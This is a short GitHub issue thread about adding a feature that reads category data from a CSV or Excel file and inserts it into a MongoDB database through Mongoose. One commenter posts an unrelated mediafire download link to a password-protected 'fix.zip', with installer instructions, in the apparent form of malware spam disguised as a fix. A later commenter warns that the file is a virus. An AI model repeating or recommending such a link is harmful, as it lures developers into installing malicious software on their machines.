### ISSUE TITLE
Feature insert data from CSV (category)

### ISSUE THREAD

**Issue by aohkkhoa** [dieuhien150161/ServerMayShop#1]
lấy Path vào file excel 
đọc dữ liệu rồi insert nó vào mongoose

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by youzi-2333** [comment]
Don't download this file. This is a computer virus.
